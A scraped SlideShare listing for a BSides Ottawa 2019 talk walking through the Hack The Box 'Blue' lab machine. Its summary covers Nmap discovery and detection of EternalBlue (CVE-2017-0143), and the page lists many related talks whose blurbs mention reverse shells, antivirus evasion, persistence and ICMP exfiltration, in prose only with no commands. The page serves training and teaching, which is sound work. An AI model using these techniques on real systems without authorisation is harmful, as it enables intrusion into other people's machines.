BSides Ottawa 2019 - HTB Blue
•Download as PPTX, PDF•
0 likes•47 views
- Diana Whitney is an IT security specialist who has worked at EWA-Canada since 2015 in their payment assurance lab testing PCI standards. She holds CySA+ and PenTest+ certifications. - An initial Nmap scan was run on 10.10.10.40 to discover open ports and services. This revealed ports 139, 445, 135, and 49152-7 were open, indicating SMB services. - Further Nmap scripts identified the host OS as Windows 7 Pro and its security mode. Scanning all 65535 ports found additional open ports. - Nmap vulnerability scripts detected a positive result for CVE-2017-0143, the EternalBlue SMB exploit. - Searchsploit was used
Report
Share
Report
Share
Recommended
Nous Sommes Cyber - HTB Blue
The expanded set of slides for the Hack the Box workshop presented n 07-Dec-2019 for Nous Sommes Cyber/We Are Cyber group in Montreal
Penetration Testing Resource Guide
This is a resource guide to getting start in penetration testing for any n00bs who wish to learn more.
Scapy TLS: A scriptable TLS 1.3 stack
Quick talk on how to leverage scapy-ssl_tls to perform TLS 1.3 testing. Covers which area of the stack are less vulnerable with TLS 1.3 as opposed to 1.2.
Pentesting custom TLS stacks
This document summarizes a presentation about pentesting custom TLS stacks. It discusses using the scapy-ssl_tls tool to craft and analyze TLS packets in order to evaluate the security of custom TLS implementations. The presentation covers TLS protocol basics, features of scapy-ssl_tls like packet parsing and crypto hooks, and techniques for analyzing areas like supported versions/ciphers, the TLS state machine, Diffie-Hellman parameters, side channels, fragmentation, and more. It aims to provide a way to efficiently reproduce TLS attacks and help test responses to vulnerabilities.
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Learn the basics of network penetration testing success - an introduction to the top three tools that will help you on your security journey: Nmap, Netcat, and Metasploit. See how to use Nmap both for port scanning and vulnerability discovery. You'll also learn how to use Netcat to grab banners, make HTTP requests, and create both reverse and bind shells. Finally, we’ll learn the ins and outs of Metasploit, including how to integrate our Nmap scan results for even more ownage and using the built-in exploits to get shells.
At the end of this, you will be port scanning, creating payloads, and popping shells. This technical workshop is designed to familiarize you with the necessary tools to continue your ethical hacking journey. From here, take your l33t new skillz and apply them to Capture The Flag (CTF) competitions or scanning your home network for vulnerabilities.
(This was originally presented on February 22, 2010 at Day of Shecurity Boston 2019).
BSides Rochester 2018: Esteban Rodriguez: Ducky In The Middle: Injecting keys...
This document summarizes Esteban Rodriguez's talk on injecting keystrokes into plaintext protocols. It discusses how protocols like VNC, HippoRemote, and early versions of Synergy sent keystrokes in plaintext, allowing them to be intercepted using tools like Wireshark. It then demonstrates how intercepted keystrokes could be cracked, monitored, or injected using tools like Metasploit, custom Python scripts, and rogue Synergy servers implemented with Dissonance. Mitigations discussed include encrypting protocols with SSL and verifying server fingerprints. The overall message is that encryption is important and security research helps improve protocols.
Reinventing anon email
Comparison of TAILS vs Liberte and their popularity counterparts Cables and Bitmessage. Presented at Rochester 2600.
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Redspin Engineer, David Shaw at Toorcon Information Security Conference giving his talk titled, Beginner's Guide to the nmap Scripting Engine.
Recommended
Nous Sommes Cyber - HTB Blue
The expanded set of slides for the Hack the Box workshop presented n 07-Dec-2019 for Nous Sommes Cyber/We Are Cyber group in Montreal
Penetration Testing Resource Guide
This is a resource guide to getting start in penetration testing for any n00bs who wish to learn more.
Scapy TLS: A scriptable TLS 1.3 stack
Quick talk on how to leverage scapy-ssl_tls to perform TLS 1.3 testing. Covers which area of the stack are less vulnerable with TLS 1.3 as opposed to 1.2.
Pentesting custom TLS stacks
This document summarizes a presentation about pentesting custom TLS stacks. It discusses using the scapy-ssl_tls tool to craft and analyze TLS packets in order to evaluate the security of custom TLS implementations. The presentation covers TLS protocol basics, features of scapy-ssl_tls like packet parsing and crypto hooks, and techniques for analyzing areas like supported versions/ciphers, the TLS state machine, Diffie-Hellman parameters, side channels, fragmentation, and more. It aims to provide a way to efficiently reproduce TLS attacks and help test responses to vulnerabilities.
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Learn the basics of network penetration testing success - an introduction to the top three tools that will help you on your security journey: Nmap, Netcat, and Metasploit. See how to use Nmap both for port scanning and vulnerability discovery. You'll also learn how to use Netcat to grab banners, make HTTP requests, and create both reverse and bind shells. Finally, we’ll learn the ins and outs of Metasploit, including how to integrate our Nmap scan results for even more ownage and using the built-in exploits to get shells.
At the end of this, you will be port scanning, creating payloads, and popping shells. This technical workshop is designed to familiarize you with the necessary tools to continue your ethical hacking journey. From here, take your l33t new skillz and apply them to Capture The Flag (CTF) competitions or scanning your home network for vulnerabilities.
(This was originally presented on February 22, 2010 at Day of Shecurity Boston 2019).
BSides Rochester 2018: Esteban Rodriguez: Ducky In The Middle: Injecting keys...
This document summarizes Esteban Rodriguez's talk on injecting keystrokes into plaintext protocols. It discusses how protocols like VNC, HippoRemote, and early versions of Synergy sent keystrokes in plaintext, allowing them to be intercepted using tools like Wireshark. It then demonstrates how intercepted keystrokes could be cracked, monitored, or injected using tools like Metasploit, custom Python scripts, and rogue Synergy servers implemented with Dissonance. Mitigations discussed include encrypting protocols with SSL and verifying server fingerprints. The overall message is that encryption is important and security research helps improve protocols.
Reinventing anon email
Comparison of TAILS vs Liberte and their popularity counterparts Cables and Bitmessage. Presented at Rochester 2600.
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Redspin Engineer, David Shaw at Toorcon Information Security Conference giving his talk titled, Beginner's Guide to the nmap Scripting Engine.
Laverna vs etherpad
- Laverna is a note taking application that stores encrypted notes locally in the browser using JavaScript rather than on a remote server.
- It uses Markdown formatting and encrypts notes using PBKDF2 before optionally syncing them to services like RemoteStorage.io or Dropbox.
- To use Laverna, it must be cloned from GitHub and built using Node.js, bower, and grunt with encryption handled entirely by the client side application.
PHP at Density and Scale
Mixing performance, configurability, density, and security at scale has, historically, been hard with PHP. Early approaches have involved CGIs, suhosin, or multiple Apache instances. Then came PHP-FPM. At Pantheon, we've taken PHP-FPM, integrated it with cgroups, namespaces, and systemd socket activation. We use it to deliver all of our goals at unheard-of densities: thousands and thousands of isolated pools per box.
Watch how it's configured and see PHP-FPM pools start real-time to serve different Drupal sites as requests come into a server.
All of our tools for this are open-source and usable on your own virtual machines and hardware.
Nmap not only a port scanner by ravi rajput comexpo security awareness meet
As every coin has two side as a same way we know only the single side of Nmap which is port scanning.
While researching I found that a lot more other than port scanning and banner grabbing can be done with the use of Nmap.
We can use Nmap for web application pen-testing and exploitation too. Yeah it won't work as efficiently as of MSF.
This can replace the use of acunetix and other paid version scanner.
BlueHat v17 || TLS 1.3 - Full speed ahead... mind the warnings - the great, t...
BlueHat v17 || TLS 1.3 - Full speed ahead... mind the warnings - the great, t...BlueHat Security Conference
Joseph Salowey, Tableau Software
Transport Layer Security (TLS) 1.3 is almost here. The protocol that protects most of the Internet secure connections is getting the biggest ever revamp, and is losing a round-trip. We will explore differences between TLS 1.3 and previous versions in detail, focusing on the performance and security improvements of the new protocol as well as some of the challenges we face around securely implementing new features such as 0-RTT resumption.
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
This presentation shows that code coverage guided fuzzing is possible in the context of network daemon fuzzing.
Some fuzzers are blackbox while others are protocol aware. Even ones which are made protocol aware, fuzzer writers typically model the protocol specification and implement packet awareness logic in the fuzzer. Unfortunately, just because the fuzzer is protocol aware, it does not guarantee that sufficient code paths have been reached.
The presentation deals with specific scenarios where the target protocol is completely unknown (proprietary) and no source code or protocol specs are accessible. The tool developed builds a feedback loop between the client and the server components using the concept of "gate functions". A gate function triggers monitoring. The pintool component tracks the binary code coverage for all the functions untill it reaches an exit gate. By instrumenting such gated functions, the tool is able to measure code coverage during packet processing.
CNIT 141 7. Keyed Hashing
A college course in Cryptography and Cryptocurrency
More info: https://samsclass.info/141/141_F21.shtml
Docker Security
Introduction to common docker security issues. Originally presented at Rochester 2600. http://www.rochester2600.com
Zi nginx conf_2015
1. The document discusses TLS session resumption across multiple servers using ngx_lua. It introduces TLS handshakes and session resumption.
2. It describes how ngx_lua can implement cross-host session resumption via session IDs and tickets through Lua scripts while maintaining performance and forward secrecy. Small patches are needed to Nginx/OpenSSL.
3. Key aspects covered are a memcached session store interface, non-blocking I/O, ticket key encryption and rotation, and configuration via Lua scripts without modifying Nginx core. This allows cross-host session resumption compatible with TLSv1.3.
Openvpn
The document provides instructions for setting up an OpenVPN server to allow both Linux and Mac OS X clients to securely connect. It describes generating certificates and keys, configuring the OpenVPN server, and then configuring Linux and Mac OS X clients to connect to the server. The key steps are:
1) Generate certificates and keys on the server using the OpenVPN easy-rsa scripts.
2) Configure the OpenVPN server configuration file and required files.
3) Distribute client certificates to Linux and Mac clients and configure the clients.
4) Start the OpenVPN server and test connectivity between clients and the server network.
Hanz and Franz
This document discusses using ICMP tunneling to covertly transmit SSH traffic between two machines without detection. It provides instructions for setting up an ICMP tunnel using the hans tool, capturing traffic before and after establishing the tunnel, and comparing the captures to see how the SSH traffic is now encapsulated in ICMP packets instead of using TCP port 22. The main objective is to demonstrate how a benign protocol like ICMP can be abused to exfiltrate data without detection by encapsulating other protocols within it.
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
The document summarizes a presentation on analyzing the security of QEMU. It introduces QEMU and describes its main attack surfaces, including device emulation, virtio, third-party libraries, VNC, Spice, and QMP. Examples of vulnerabilities found in Cirrus VGA, virtio filesystem, virglrenderer library, VNC, and QMP are provided. The document concludes with thoughts on efficient security analysis, noting that combining in-depth knowledge with fuzzing is most effective for finding bugs in complex software like QEMU.
Dhcp security #netseckh
The document discusses DHCP security spoofing vs snooping. DHCP snooping is a method used on switches to prevent DHCP spoofing attacks by monitoring DHCP packets and building a DHCP snooping binding database to ensure only authorized DHCP servers can respond to requests. The document provides configuration examples for enabling DHCP snooping on a switch and designating trusted ports.
Enumeration
Part of our Penetration Testing series. How to scan networks and find an attack path! An overview of the process of enumeration.
N map presentation
Nmap is a security scanning tool that can discover open ports, scan for services, and determine operating systems on a network. It works by sending packets to IP addresses and analyzing the responses to infer information about the target system, such as which ports are open or closed and what services are running. Nmap displays this information to the user and can be run from both graphical and command line interfaces on many operating systems. While useful for security auditing, Nmap could also enable hacking if used without permission on a network.
2600 av evasion_deuce
This document summarizes a presentation on evading antivirus detection. It discusses how antivirus has gotten better at detecting old techniques, and introduces newer tools and methods for generating payloads that can bypass antivirus software, including Veil, Hyperion, and writing your own custom stagers and payloads. It also recommends building your own antivirus lab to reliably test new payloads before deployment.
OpenVPN
This document discusses setting up an OpenVPN network between two sites. It includes generating certificates using OpenSSL, configuring a bridge and TAP interfaces using bridging-utils, and configuring the OpenVPN server and client. The OpenVPN server is configured to use the TAP interface and bridge, and authentication is set up using the certificates. Instructions are provided on starting the OpenVPN service and ensuring it starts at system boot.
CNIT 141: 7. Keyed Hashing
For a college course -- CNIT 141: Cryptography for Computer Networks, at City College San Francisco
Based on "Serious Cryptography: A Practical Introduction to Modern Encryption", by Jean-Philippe Aumasson, No Starch Press (November 6, 2017), ISBN-10: 1593278268 ISBN-13: 978-1593278267
Instructor: Sam Bowne
More info: https://samsclass.info/141/141_S19.shtml
Nmap scripting engine
This document provides an overview and agenda for a training on the Nmap Scripting Engine (NSE). It begins with a 10 minute introduction to Nmap, covering what Nmap is used for and some basic scan options. Next, it spends 20 minutes reviewing the existing NSE script categories and how to use available scripts, demonstrating two sample scripts. Finally, it dedicates 20 minutes to explaining how to write your own NSE script, including the basic structure and providing an example of writing a script to find the website title.
Last mile authentication problem: Exploiting the missing link in end-to-end s...
"With ""Trust none over the Internet"" mindset, securing all communication between a client and a server with protocols such as TLS has become a common practice. However, while the communication over Internet is routinely secured, there is still an area where such security awareness is not seen: inside individual computers, where adversaries are often not expected.
This talk discusses the security of various inter-process communication (IPC) mechanisms that local processes and applications use to interact with each other. In particular, we show IPC-related vulnerabilities that allow a non-privileged process to steal passwords stored in popular password managers and even second factors from hardware tokens. With passwords being the primary way of authentication, the insecurity of this ""last mile"" causes the security of the rest of the communication strands to be obsolete. The vulnerabilities that we demonstrate can be exploited on multi-user computers that may have processes of multiple users running at the same time. The attacker is a non-privileged user trying to steal sensitive information from other users. Such computers can be found in enterprises with centralized access control that gives multiple users access to the same host. Computers with guest accounts and shared computers at home are similarly vulnerable."
XenTT: Deterministic Systems Analysis in Xen
The document describes XenTT, a tool for deterministic replay in the Xen virtualization platform. XenTT records the execution history of a guest VM, including nondeterministic events like interrupts and I/O. It then replays the execution deterministically to allow for repeatable systems analysis. This is done by making the CPU and execution environment deterministic during replay and precisely recording the timing and location of nondeterministic events during the original run.
Client side exploits
This document discusses client-side exploits and tools used for testing them in a controlled network environment. It covers using Metasploit on Kali Linux to generate and encode a Meterpreter reverse TCP payload, deploying it on a Windows client virtual machine, and using Meterpreter post-exploitation commands to maintain access including disabling antivirus and establishing persistence. The goal is to achieve a low detection payload and compromise the client while evading detection, though the document notes that no method is foolproof and antivirus vendors adapt.
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
Virtual machines play a crucial role in modern computing. They often are used to isolate multiple customers with instances on the same physical server. Virtual machines are also used by researchers and security practitioners to isolate potentially harmful code for analysis and review. The assumption being made is that by running in a virtual machine, the potentially harmful code cannot execute anywhere else. However, this is not foolproof, as a vulnerability in the virtual machine hypervisor can give access to the entire system. While this was once thought of as just hypothetical, two separate demonstrations at Pwn2Own 2017 proved this exact scenario.
This talk details the host-to-guest communications within VMware. Additionally, the presentation covers the functionalities of the RPC interface. In this section of the presentation, we discuss the techniques that can be used to record or sniff the RPC requests sent from the Guest OS to the Host OS automatically. We also demonstrate how to write tools to query the RPC Interface in C++ and Python for fuzzing purposes.
Finally, we demonstrate how to exploit Use-After-Free vulnerabilities in VMware by walking through a patched vulnerability.
More Related Content
What's hot
Laverna vs etherpad
- Laverna is a note taking application that stores encrypted notes locally in the browser using JavaScript rather than on a remote server.
- It uses Markdown formatting and encrypts notes using PBKDF2 before optionally syncing them to services like RemoteStorage.io or Dropbox.
- To use Laverna, it must be cloned from GitHub and built using Node.js, bower, and grunt with encryption handled entirely by the client side application.
PHP at Density and Scale
Mixing performance, configurability, density, and security at scale has, historically, been hard with PHP. Early approaches have involved CGIs, suhosin, or multiple Apache instances. Then came PHP-FPM. At Pantheon, we've taken PHP-FPM, integrated it with cgroups, namespaces, and systemd socket activation. We use it to deliver all of our goals at unheard-of densities: thousands and thousands of isolated pools per box.
Watch how it's configured and see PHP-FPM pools start real-time to serve different Drupal sites as requests come into a server.
All of our tools for this are open-source and usable on your own virtual machines and hardware.
Nmap not only a port scanner by ravi rajput comexpo security awareness meet
As every coin has two side as a same way we know only the single side of Nmap which is port scanning.
While researching I found that a lot more other than port scanning and banner grabbing can be done with the use of Nmap.
We can use Nmap for web application pen-testing and exploitation too. Yeah it won't work as efficiently as of MSF.
This can replace the use of acunetix and other paid version scanner.
BlueHat v17 || TLS 1.3 - Full speed ahead... mind the warnings - the great, t...
BlueHat v17 || TLS 1.3 - Full speed ahead... mind the warnings - the great, t...BlueHat Security Conference
Joseph Salowey, Tableau Software
Transport Layer Security (TLS) 1.3 is almost here. The protocol that protects most of the Internet secure connections is getting the biggest ever revamp, and is losing a round-trip. We will explore differences between TLS 1.3 and previous versions in detail, focusing on the performance and security improvements of the new protocol as well as some of the challenges we face around securely implementing new features such as 0-RTT resumption.
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
This presentation shows that code coverage guided fuzzing is possible in the context of network daemon fuzzing.
Some fuzzers are blackbox while others are protocol aware. Even ones which are made protocol aware, fuzzer writers typically model the protocol specification and implement packet awareness logic in the fuzzer. Unfortunately, just because the fuzzer is protocol aware, it does not guarantee that sufficient code paths have been reached.
The presentation deals with specific scenarios where the target protocol is completely unknown (proprietary) and no source code or protocol specs are accessible. The tool developed builds a feedback loop between the client and the server components using the concept of "gate functions". A gate function triggers monitoring. The pintool component tracks the binary code coverage for all the functions untill it reaches an exit gate. By instrumenting such gated functions, the tool is able to measure code coverage during packet processing.
CNIT 141 7. Keyed Hashing
A college course in Cryptography and Cryptocurrency
More info: https://samsclass.info/141/141_F21.shtml
Docker Security
Introduction to common docker security issues. Originally presented at Rochester 2600. http://www.rochester2600.com
Zi nginx conf_2015
1. The document discusses TLS session resumption across multiple servers using ngx_lua. It introduces TLS handshakes and session resumption.
2. It describes how ngx_lua can implement cross-host session resumption via session IDs and tickets through Lua scripts while maintaining performance and forward secrecy. Small patches are needed to Nginx/OpenSSL.
3. Key aspects covered are a memcached session store interface, non-blocking I/O, ticket key encryption and rotation, and configuration via Lua scripts without modifying Nginx core. This allows cross-host session resumption compatible with TLSv1.3.
Openvpn
The document provides instructions for setting up an OpenVPN server to allow both Linux and Mac OS X clients to securely connect. It describes generating certificates and keys, configuring the OpenVPN server, and then configuring Linux and Mac OS X clients to connect to the server. The key steps are:
1) Generate certificates and keys on the server using the OpenVPN easy-rsa scripts.
2) Configure the OpenVPN server configuration file and required files.
3) Distribute client certificates to Linux and Mac clients and configure the clients.
4) Start the OpenVPN server and test connectivity between clients and the server network.
Hanz and Franz
This document discusses using ICMP tunneling to covertly transmit SSH traffic between two machines without detection. It provides instructions for setting up an ICMP tunnel using the hans tool, capturing traffic before and after establishing the tunnel, and comparing the captures to see how the SSH traffic is now encapsulated in ICMP packets instead of using TCP port 22. The main objective is to demonstrate how a benign protocol like ICMP can be abused to exfiltrate data without detection by encapsulating other protocols within it.
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
The document summarizes a presentation on analyzing the security of QEMU. It introduces QEMU and describes its main attack surfaces, including device emulation, virtio, third-party libraries, VNC, Spice, and QMP. Examples of vulnerabilities found in Cirrus VGA, virtio filesystem, virglrenderer library, VNC, and QMP are provided. The document concludes with thoughts on efficient security analysis, noting that combining in-depth knowledge with fuzzing is most effective for finding bugs in complex software like QEMU.
Dhcp security #netseckh
The document discusses DHCP security spoofing vs snooping. DHCP snooping is a method used on switches to prevent DHCP spoofing attacks by monitoring DHCP packets and building a DHCP snooping binding database to ensure only authorized DHCP servers can respond to requests. The document provides configuration examples for enabling DHCP snooping on a switch and designating trusted ports.
Enumeration
Part of our Penetration Testing series. How to scan networks and find an attack path! An overview of the process of enumeration.
N map presentation
Nmap is a security scanning tool that can discover open ports, scan for services, and determine operating systems on a network. It works by sending packets to IP addresses and analyzing the responses to infer information about the target system, such as which ports are open or closed and what services are running. Nmap displays this information to the user and can be run from both graphical and command line interfaces on many operating systems. While useful for security auditing, Nmap could also enable hacking if used without permission on a network.
2600 av evasion_deuce
This document summarizes a presentation on evading antivirus detection. It discusses how antivirus has gotten better at detecting old techniques, and introduces newer tools and methods for generating payloads that can bypass antivirus software, including Veil, Hyperion, and writing your own custom stagers and payloads. It also recommends building your own antivirus lab to reliably test new payloads before deployment.
OpenVPN
This document discusses setting up an OpenVPN network between two sites. It includes generating certificates using OpenSSL, configuring a bridge and TAP interfaces using bridging-utils, and configuring the OpenVPN server and client. The OpenVPN server is configured to use the TAP interface and bridge, and authentication is set up using the certificates. Instructions are provided on starting the OpenVPN service and ensuring it starts at system boot.
CNIT 141: 7. Keyed Hashing
For a college course -- CNIT 141: Cryptography for Computer Networks, at City College San Francisco
Based on "Serious Cryptography: A Practical Introduction to Modern Encryption", by Jean-Philippe Aumasson, No Starch Press (November 6, 2017), ISBN-10: 1593278268 ISBN-13: 978-1593278267
Instructor: Sam Bowne
More info: https://samsclass.info/141/141_S19.shtml
Nmap scripting engine
This document provides an overview and agenda for a training on the Nmap Scripting Engine (NSE). It begins with a 10 minute introduction to Nmap, covering what Nmap is used for and some basic scan options. Next, it spends 20 minutes reviewing the existing NSE script categories and how to use available scripts, demonstrating two sample scripts. Finally, it dedicates 20 minutes to explaining how to write your own NSE script, including the basic structure and providing an example of writing a script to find the website title.
Last mile authentication problem: Exploiting the missing link in end-to-end s...
"With ""Trust none over the Internet"" mindset, securing all communication between a client and a server with protocols such as TLS has become a common practice. However, while the communication over Internet is routinely secured, there is still an area where such security awareness is not seen: inside individual computers, where adversaries are often not expected.
This talk discusses the security of various inter-process communication (IPC) mechanisms that local processes and applications use to interact with each other. In particular, we show IPC-related vulnerabilities that allow a non-privileged process to steal passwords stored in popular password managers and even second factors from hardware tokens. With passwords being the primary way of authentication, the insecurity of this ""last mile"" causes the security of the rest of the communication strands to be obsolete. The vulnerabilities that we demonstrate can be exploited on multi-user computers that may have processes of multiple users running at the same time. The attacker is a non-privileged user trying to steal sensitive information from other users. Such computers can be found in enterprises with centralized access control that gives multiple users access to the same host. Computers with guest accounts and shared computers at home are similarly vulnerable."
XenTT: Deterministic Systems Analysis in Xen
The document describes XenTT, a tool for deterministic replay in the Xen virtualization platform. XenTT records the execution history of a guest VM, including nondeterministic events like interrupts and I/O. It then replays the execution deterministically to allow for repeatable systems analysis. This is done by making the CPU and execution environment deterministic during replay and precisely recording the timing and location of nondeterministic events during the original run.
What's hot (20)
Nmap not only a port scanner by ravi rajput comexpo security awareness meet
Nmap not only a port scanner by ravi rajput comexpo security awareness meet
BlueHat v17 || TLS 1.3 - Full speed ahead... mind the warnings - the great, t...
BlueHat v17 || TLS 1.3 - Full speed ahead... mind the warnings - the great, t...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
Last mile authentication problem: Exploiting the missing link in end-to-end s...
Last mile authentication problem: Exploiting the missing link in end-to-end s...
Similar to BSides Ottawa 2019 - HTB Blue
Client side exploits
This document discusses client-side exploits and tools used for testing them in a controlled network environment. It covers using Metasploit on Kali Linux to generate and encode a Meterpreter reverse TCP payload, deploying it on a Windows client virtual machine, and using Meterpreter post-exploitation commands to maintain access including disabling antivirus and establishing persistence. The goal is to achieve a low detection payload and compromise the client while evading detection, though the document notes that no method is foolproof and antivirus vendors adapt.
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
Virtual machines play a crucial role in modern computing. They often are used to isolate multiple customers with instances on the same physical server. Virtual machines are also used by researchers and security practitioners to isolate potentially harmful code for analysis and review. The assumption being made is that by running in a virtual machine, the potentially harmful code cannot execute anywhere else. However, this is not foolproof, as a vulnerability in the virtual machine hypervisor can give access to the entire system. While this was once thought of as just hypothetical, two separate demonstrations at Pwn2Own 2017 proved this exact scenario.
This talk details the host-to-guest communications within VMware. Additionally, the presentation covers the functionalities of the RPC interface. In this section of the presentation, we discuss the techniques that can be used to record or sniff the RPC requests sent from the Guest OS to the Host OS automatically. We also demonstrate how to write tools to query the RPC Interface in C++ and Python for fuzzing purposes.
Finally, we demonstrate how to exploit Use-After-Free vulnerabilities in VMware by walking through a patched vulnerability.
Network Penetration Testing
The Slides deck contains Network penetration testing requirements & Tools used in real world pentesting. For Demo purposes, I had used a vulnhub machine called Metasploitable 2 for testing purposes. Looking into various Ports and Services Vulnerabilities using Kali open source tools.
Black hat dc-2010-egypt-uav-slides
Unmanned Aerial Vehicles can be automated using Metasploit to fingerprint clients, scan for servers, and exploit vulnerabilities. Metasploit provides built-in modules to automate scanning networks using tools like Nmap and Nexpose. Exploits and payloads can then be automatically run on vulnerable servers and clients. Post-exploitation activities can also be automated using Meterpreter scripts and plugins to perform tasks like privilege escalation, packet capture, and maintaining persistence.
Encrypt your volumes with barbican open stack 2018
This document discusses encrypting volumes with Barbican in OpenStack. It provides an introduction to Barbican and encryption, describes how Barbican works with Nova and Cinder to provide transparent encryption of volumes using LUKS, discusses some issues the presenter encountered integrating Barbican on OnRamp's private cloud and how they were resolved, and limitations to be aware of when using encrypted volumes. It concludes with a demo and Q&A.
How to setup OpenVPN Server and Client on Ubuntu 14.04
The purpose of OpenVPN is simple; it allows connecting to other devices within one secure network. It allows to keep online data safe by tunneling them through encrypted servers. So if you’re looking for a reliable, easy-to-use system that is adaptable enough to deal with any operating system, then OpenVPN is a no-brainer.
Presented by VEXXHOST, provider of Openstack based Public and Private Cloud Infrastructure
https://vexxhost.com/
Network Scanning Phases and Supporting Tools
This presentation focuses on the network penetration scanning phase. It introduces tools and techniques that professional pen-testers and ethical hackers need to master to find target machines, openings on those targets and vulnerabilities.
BSIDES-PR Keynote Hunting for Bad Guys
This document discusses techniques for hunting bad guys on networks, including identifying client-side attacks, malware command and control channels, post-exploitation activities, and hunting artifacts. It provides examples of using DNS logs, firewall logs, HTTP logs, registry keys, installed software inventories, and the AMCache registry hive to look for anomalous behaviors that could indicate security compromises. The goal is to actively hunt for threats rather than just detecting known bad behaviors.
Nagios Conference 2014 - Leland Lammert - Distributed Heirarchical Nagios
Leland Lammert's presentation on Distributed Heirarchical Nagios.
The presentation was given during the Nagios World Conference North America held Oct 13th - Oct 16th, 2014 in Saint Paul, MN. For more information on the conference (including photos and videos), visit: http://go.nagios.com/conference
Automating Post Exploitation with PowerShell
As organizations assess the security of their information systems, the need for automation has become more and more apparent. Not only are organizations attempting to automate their assessments, the need is becoming more pressing to perform assessments centrally against large numbers of enterprise systems. Penetration testers can use this automation to make their post-exploitation efforts more thorough, repeatable, and efficient. Defenders need to understand the techniques attackers are using once an initial compromise has occurred so they can build defenses to stop the attacks. Microsoft's PowerShell scripting language has become the defacto standard for many organizations looking to perform this level of distributed automation. In this presentation James Tarala, of Enclave Security, will describe to students the enterprise capabilities PowerShell offers and show practical examples of how PowerShell can be used to perform large scale penetration tests of Microsoft Windows systems.
CI and CD
CI and CD processes like Continuous Integration (CI), Continuous Delivery (CD), and Continuous Deployment (CD) help software teams integrate code changes frequently and release software quickly. CI involves integrating code into a shared repository multiple times daily and automatically verifying each change. Continuous Delivery sets up software to be released to production at any time. Continuous Deployment means every code change is automatically deployed to production, allowing for many releases per day. Key aspects of CI include job definitions in repositories, autoscaling infrastructure, caching dependencies, using Docker for builds, and matrix builds across different environments and versions.
Null Delhi chapter - Feb 2019
Network scanning with Nmap for Noobs and Ninjas - This slide was presented at Null Delhi monthly security meet by Nikhil and Jayvardhan.
https://www.facebook.com/nullOwaspDelhi/
Recon with Nmap
The document discusses using Nmap to perform network scanning and reconnaissance. It provides an overview of Nmap, describing common scan types like TCP and UDP scans. It also covers useful Nmap options for tasks like service and operating system detection. The document demonstrates the Nmap Scripting Engine for tasks like vulnerability scanning and brute force attacks. It provides examples of commands for different scan types and scripts.
Ecase direct servlet acess v1
The document discusses EnCase Direct Network Preview, which allows an examiner to access and examine data on a powered-on computer remotely. It involves generating encryption key pairs, creating a direct servlet file using the public key, deploying the servlet on the target computer, and then connecting from the examiner's EnCase interface by providing the IP address and port. This enables viewing and analyzing the contents of drives, removable media, and memory on the live remote system without needing authentication files or passphrases if disks are encrypted.
Small Python Tools for Software Release Engineering
The document discusses using Python scripts to automate the provisioning of temporary virtual machines from templates for tasks like software testing using the XenAPI to control XenServer virtualization. It provides code examples for creating a VM from a template, starting it, copying files in, running scripts, and then destroying the VM after use in order to automate volatile computing resources on demand. The scripts allow for non-interactive use by command line options to select templates, preload files, and initialize scripts.
DC612 Day - Hands on Penetration Testing 101
Title: Hands on Penetration Testing 101 by Scott Sutherland & Karl Fosaaen
Abstract: The goal of this training is to introduce attendees to standard penetration test methodologies, tools, and techniques. Hands on labs will cover the basics of asset discovery, vulnerability enumeration, system penetration, privilege escalation, and bypassing end point protection. During the labs, common vulnerabilities will be leveraged to illustrate attack techniques, using freely available tools such as Nmap and Metasploit. This training will be valuable to anyone interested in gaining a better understanding of penetration testing or to system administrators trying to understand common attack approaches.
[CLASS 2014] Palestra Técnica - Jonathan Knudsen
Título da Palestra: Gerenciando um legado de vulnerabilidades em sistemas de controle - Lições aprendidas a partir do Heartbleed e mais
Ansible is the simplest way to automate. SymfonyCafe, 2015
Ansible is a radically simple IT automation engine that is clear, fast, complete, efficient, and secure. It can be used for configuration management and infrastructure orchestration, deployments and builds, and provisioning for Vagrant. Ansible uses YAML files and templates to define automation tasks and plays. It provides advantages over shell scripts such as organization, reusability, and parallelization.
Owning computers without shell access 2
These are the slides from my talk at BSides Puerto Rico 2013. I will post a link to the slides later.
Abstract:
For many years Penetration Testers have relied on gaining shell access to remote systems in order to take ownership of network resources and enterprise owned assets. AntiVirus (AV) companies are becoming increasingly more aware of shell signatures and are therefore making it more and more difficult to compromise remote hosts. The current industry mentality seams to believe the answer is stealthier payloads and super complex obfuscation techniques. I believe a more effective answer might lie in alternative attack methodologies involving authenticated execution of native Windows commands to accomplish the majority of shell reliant tasks common to most network level penetration tests. The techniques I will be discussing were developed precisely with this style of attack in mind. Using these new tools, I will demonstrate how to accomplish the same degree of network level compromise that has been enjoyed in the past with shell-based attack vectors, while avoiding detection from AV solut
Automation with ansible
A hands-on workshop on "Automation with Ansible". Starting from installing and setting up Ansible to managing servers and application deployments.
Similar to BSides Ottawa 2019 - HTB Blue (20)
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
Encrypt your volumes with barbican open stack 2018
Encrypt your volumes with barbican open stack 2018
How to setup OpenVPN Server and Client on Ubuntu 14.04
How to setup OpenVPN Server and Client on Ubuntu 14.04
Nagios Conference 2014 - Leland Lammert - Distributed Heirarchical Nagios
Nagios Conference 2014 - Leland Lammert - Distributed Heirarchical Nagios
Small Python Tools for Software Release Engineering
Small Python Tools for Software Release Engineering
Ansible is the simplest way to automate. SymfonyCafe, 2015
Ansible is the simplest way to automate. SymfonyCafe, 2015
Recently uploaded
Energy Efficient Video Encoding for Cloud and Edge Computing Instances
Energy Efficient Video Encoding for Cloud and Edge Computing Instances
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
Discover how MongoDB Atlas and vector search technology can revolutionize your application's search capabilities. This comprehensive presentation covers:
* What is Vector Search?
* Importance and benefits of vector search
* Practical use cases across various industries
